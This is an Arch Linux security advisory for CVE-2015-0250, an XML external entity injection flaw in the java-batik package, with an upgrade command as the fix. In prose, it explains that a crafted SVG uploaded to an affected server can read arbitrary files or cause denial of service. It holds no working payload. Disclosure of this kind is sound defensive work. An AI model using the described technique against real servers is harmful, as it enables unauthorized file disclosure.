Arch Linux Security Advisory ASA-201504-5 ========================================= Severity: Medium Date : 2015-04-04 CVE-ID : CVE-2015-0250 Package : java-batik Type : xml external entity injection Remote : Yes Link : https://wiki.archlinux.org/index.php/CVE Summary ======= The package java-batik before version 1.8-1 is vulnerable to xml external entity injection. Resolution ========== Upgrade to 1.8-1. # pacman -Syu "java-batik>=1.8-1" The problem has been fixed upstream in version 1.8. Workaround ========== None. Description =========== Batik offers several classes for SVG to PNG/JPG conversion, which suffer from a XML External Entity Injection due to the evaluation of external entities within the given SVG file. If an application offers the possibility to upload a SVG file an attacker can put in a malicious formed file and retrieve sensitive information such as the content of files of the respective server. The type of file that can be retrieved depends on the user context in which the application is running. Impact ====== A remote attacker is able to use a specially crafted SVG file to read arbitrary files or cause a denial of service. References ========== http://seclists.org/fulldisclosure/2015/Mar/142 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0250 https://bugs.archlinux.org/task/44410